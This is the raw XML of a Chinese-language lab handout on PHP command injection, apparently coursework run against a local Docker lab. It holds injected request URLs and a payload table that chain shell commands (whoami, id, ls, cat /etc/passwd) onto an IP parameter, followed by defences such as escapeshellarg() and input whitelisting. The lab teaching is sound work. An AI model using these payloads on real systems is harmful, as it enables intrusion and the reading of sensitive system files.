                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1;whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45C4E436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效果：显示当前用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33700151">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤 5：读取敏感文件 /etc/passwd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="019D5458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280" w:type="dxa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4A0A18D">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1;cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="371CC0F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效果：读取系统用户文件，漏洞利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA7350">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB17167">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.2.3 常用 Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
      </w:tblGrid>
      <w:tr w14:paraId="18053656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2CFD6C5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Payload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4A34B62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效果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C022DEA"/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5F653C9"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F944C24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DB9A138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[127.0.0.1](127.0.0.1);whoami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1A68C76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顺序执行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F038D3D"/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92C0A4F"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B7582C7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A5F4DF9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[127.0.0.1](127.0.0.1)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EB907B7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ifconfig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6BAE79A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截断执行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6DA9F2B"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="744752B4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03CFE2C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[127.0.0.1](127.0.0.1)&amp;&amp;ls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308A528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前成功后执行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629A0CD"/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532B126"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10447838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2314F1F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test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74A0630">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
            </w:pP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661E4A6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id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6CAD6E5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前失败后执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10B93525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1B13007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[127.0.0.1](127.0.0.1);cat /etc/passwd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4B50B91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读取敏感文件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C5AADD7"/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243C16D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ABAB04D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DD2478">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>三、项目 5 总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="38D3491F">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>1. 知识点汇总</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="4EA96E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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5.1：命令执行函数、命令连接符、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>escapeshellarg()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3CAB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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5.2：漏洞成因、复现步骤、Payload 构造。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21130919">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>2. 漏洞与防御对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
      </w:tblGrid>
      <w:tr w14:paraId="1091B5D7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4E69CD8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文件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7E5813D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类型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7D10D2D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过滤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AF50339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状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69A9606E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121043D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testExec.php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C301C6E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教学演示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A02137A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无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AF9A982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无输入点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5DF6B24F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BFBF0F8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repairExec.php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7A99BC1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防御演示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0103866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escapeshellarg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368DB76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安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5077C255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E9E2020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exec/01.php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9FD8100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漏洞演示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1A1A531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无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96220C1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高危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3658882B">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3. 防御方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="654915CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>escapeshellarg()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>escapeshellcmd()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>转义输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DFC06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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不直接拼接用户输入到系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8DF20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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限制命令执行函数使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0D9F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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使用白名单校验输入格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56699ABB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F489140">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>四、Docker 快速操作命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="4AA5BAB4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280" w:type="dxa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12E30BA">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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docker exec -it bc23a49cb37c /bin/bash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cd /var/www/html/test_exec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cat testExec.php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cat repairExec.php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cd ../exec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cat 01.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="350A004A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId3" w:type="default"/>
      <w:footerReference r:id="rId4" w:type="default"/>
      <w:pgSz w:w="11905" w:h="1684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54330C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502D5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461FADE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8461FADE"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="9239341B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9239341B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2">
    <w:nsid w:val="9288B902"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9288B902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3">
    <w:nsid w:val="9C8AC8EF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9C8AC8EF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4">
    <w:nsid w:val="B0F1ACD9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B0F1ACD9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5">
    <w:nsid w:val="B5E306ED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5E306ED"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="BE923771"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BE923771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7">
    <w:nsid w:val="BF205925"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF205925"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="C8879AEF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8879AEF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9">
    <w:nsid w:val="CF092B84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF092B84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10">
    <w:nsid w:val="D7F9FE59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7F9FE59"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="DCBA6B53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DCBA6B53"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="F4B5D9F5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F4B5D9F5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="0053208E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0053208E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14">
    <w:nsid w:val="0248C179"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0248C179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15">
    <w:nsid w:val="03D62ECE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03D62ECE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16">
    <w:nsid w:val="0E640482"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E640482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17">
    <w:nsid w:val="2470EC97"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2470EC97"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18">
    <w:nsid w:val="25B654F3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25B654F3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19">
    <w:nsid w:val="2A8F537B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2A8F537B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20">
    <w:nsid w:val="39A0D9AC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="39A0D9AC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21">
    <w:nsid w:val="46A08BB8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46A08BB8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22">
    <w:nsid w:val="4C1BAE26"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C1BAE26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23">
    <w:nsid w:val="4D4DC07F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D4DC07F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">
    <w:nsid w:val="59ADCABA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59ADCABA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25">
    <w:nsid w:val="5A241D34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A241D34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26">
    <w:nsid w:val="60382F6E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60382F6E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27">
    <w:nsid w:val="629F7852"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="629F7852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28">
    <w:nsid w:val="72183CF9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72183CF9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29">
    <w:nsid w:val="77ECEA79"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="77ECEA79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30">
    <w:nsid w:val="7C246926"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7C246926"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="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documentProtection w:enforcement="0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31F0E3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600</Words>
  <Characters>1345</Characters>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1448</CharactersWithSpaces>
  <Application>WPS Office_12.1.0.25865_F1E327BC-269C-435d-A152-05C5408002CA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2026-05-07T02:33:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>萧泽亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-07T02:37:51Z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eyJoZGlkIjoiNzY2ZjAyN2JjMDBhNTk3ZWY1YmM2YzE2NGFhZDc3ODYiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.25865</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>2565C2073B3646EFA6B146E679B89EEA_13</vt:lpwstr>
  </property>
</Properties>
</file>